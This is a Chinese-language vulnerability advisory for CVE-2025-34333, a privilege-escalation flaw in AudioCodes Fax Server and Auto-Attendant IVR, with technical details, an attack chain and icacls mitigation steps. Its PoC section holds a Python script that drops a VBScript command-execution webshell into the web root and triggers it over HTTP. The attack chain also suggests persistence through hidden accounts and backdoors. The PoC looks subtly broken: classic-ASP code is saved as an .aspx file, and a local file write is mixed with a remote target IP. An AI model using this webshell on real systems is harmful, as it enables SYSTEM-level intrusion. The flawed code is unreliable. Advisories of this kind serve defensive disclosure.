CVE-2025-34333 AudioCodes Fax Server 权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-34333

漏洞类型

本地权限提升/任意代码执行

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

AudioCodes Fax Server, AudioCodes Auto-Attendant IVR

漏洞概述

CVE-2025-34333是AudioCodes公司Fax Server和Auto-Attendant IVR设备中的一个高危本地权限提升漏洞。该漏洞存在于版本2.6.23及之前的所有版本中，源于Web文档根目录(C:\F2MAdmin\F2E)的文件系统权限配置过于宽松。系统将Web根目录设置为可写状态，而Web服务器进程以NT AUTHORITY\SYSTEM高权限账户运行。这导致任何经过本地身份验证的低权限用户都能在Web根目录下创建或修改服务器端脚本，并通过HTTP请求触发这些脚本的执行。攻击成功后将获得SYSTEM级别的系统权限，实现完全的本地权限提升。此漏洞被VulnCheck安全研究人员发现并披露，CVSS评分达到7.8分，属于高危漏洞。由于攻击向量为本地且需要认证，因此主要威胁场景为内部人员滥用或已被入侵的终端进行横向移动。

技术细节

该漏洞的核心问题是Windows文件系统权限配置错误与高权限服务账户的组合利用。具体来说，AudioCodes Fax Server和IVR设备的Web服务器配置将文档根目录设置为C:\F2MAdmin\F2E，但该目录继承或设置了Everyone或Users组对目录的完全控制权限。攻击者作为经过本地认证的低权限用户，对该目录具有写入和修改权限。由于Web服务器(IIS或内嵌HTTP服务)以SYSTEM账户运行，当攻击者向Web根目录写入恶意脚本(如ASP、ASPX、JSP等可执行脚本)后，通过HTTP请求访问该脚本时，服务器会以SYSTEM权限解析执行脚本内容。这意味着攻击者可以在Web根目录放置webshell或直接执行任意系统命令，获得目标系统的最高控制权限。攻击者通常会创建如cmd.aspx或shell.asp等文件，然后使用curl或浏览器访问这些文件来执行系统命令。由于SYSTEM权限远超管理员权限，攻击者可以创建隐藏账户、植入后门、窃取凭据或部署恶意软件，实现持久化控制。

攻击链分析

STEP 1

1. 信息收集

攻击者获得AudioCodes Fax Server或IVR设备的本地访问权限，确认版本低于等于2.6.23

STEP 2

2. 权限探测

检查C:\F2MAdmin\F2E目录权限，确认当前用户对该目录具有写入权限

STEP 3

3. 恶意脚本植入

向Web根目录写入ASP/ASPX等可执行脚本，如webshell或直接执行系统命令的脚本

STEP 4

4. HTTP请求触发

通过HTTP请求访问植入的恶意脚本，触发服务器以SYSTEM权限解析执行脚本

STEP 5

5. 权限提升完成

成功以SYSTEM权限执行任意代码，可执行whoami确认当前用户为NT AUTHORITY\SYSTEM

STEP 6

6. 持久化控制

创建隐藏账户、植入后门或部署恶意软件，实现长期控制目标系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-34333 AudioCodes Fax Server LPE PoC
# Requirements: Local authentication on target system

import os
import requests
import sys

TARGET_IP = "192.168.1.100"
WEB_ROOT = "C:\\F2MAdmin\\F2E"

# Create malicious ASP webshell
webshell_content = '''<%@ Language=VBScript %>
<%
Dim cmd
cmd = Request.Form("cmd")
If cmd <> "" Then
    Dim oShell
    Set oShell = CreateObject("WScript.Shell")
    Dim oExec
    Set oExec = oShell.Exec(cmd)
    Dim output
    output = oExec.StdOut.ReadAll()
    Response.Write(output)
End If
%>
'''

def exploit():
    print("[*] CVE-2025-34333 AudioCodes Fax Server LPE")
    print("[*] Target: " + TARGET_IP)
    
    # Step 1: Write webshell to webroot
    webshell_path = os.path.join(WEB_ROOT, "cmd.aspx")
    with open(webshell_path, 'w') as f:
        f.write(webshell_content)
    print("[+] Webshell written to: " + webshell_path)
    
    # Step 2: Trigger webshell via HTTP
    webshell_url = f"http://{TARGET_IP}/cmd.aspx"
    try:
        # Execute whoami command
        data = {"cmd": "whoami"}
        response = requests.post(webshell_url, data=data, timeout=10)
        print("[+] Response from server:")
        print(response.text)
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    exploit()

影响范围

AudioCodes Fax Server <= 2.6.23

AudioCodes Auto-Attendant IVR <= 2.6.23

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解：1)限制对AudioCodes设备的物理和远程访问，仅允许授权管理员操作；2)使用icacls命令收紧Web根目录权限：icacls "C:\F2MAdmin\F2E" /inheritance:r /grant "SYSTEM:(OI)(CI)F" "Administrators:(OI)(CI)F"，移除普通用户和Everyone组的写入权限；3)监控安全日志中与该目录相关的文件创建和修改事件；4)考虑在边界防火墙上限制对Web管理接口的非授权访问。